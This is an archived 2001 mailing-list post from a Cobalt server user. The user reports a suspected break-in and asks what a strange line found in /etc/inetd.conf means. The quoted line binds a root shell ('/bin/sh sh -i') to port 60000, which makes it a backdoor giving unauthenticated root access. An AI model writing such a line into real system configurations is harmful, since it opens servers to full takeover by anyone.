[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!

Subject: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
From: "Craig Napier" <craignapier@xxxxxxxxxxx>
Date: Wed Feb 14 21:59:02 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

We just replaced a system that had been hacked over the weekend, and afterreading the last post (Another Hack), I checked /etc/inetd.conf on all threeboxes.. The one that was just replaced has a new line at the bottom of thefile that the other two boxes don't have...


# End of inetd.conf
#swat      stream  tcp     nowait.400      root /usr/sbin/swat swat
60000 stream tcp nowait root /bin/sh sh -i

What is port 60000..? Should I just remove this line and reboot the box..?Just trying to figure out if it's compromised again.. even with all thepatches and updates installed *EVEN* before it was brought back online..


-Craig
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com

Follow-Ups:
- Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
  - From: inc
- Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
  - From: Gerald Waugh

Prev by Date: Re: [cobalt-users] Cobalt Email Support Form
Next by Date: RE: [cobalt-users] Deterring Hackers
Previous by thread: RE: [cobalt-users] Another Raq3 Hack
Next by thread: Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index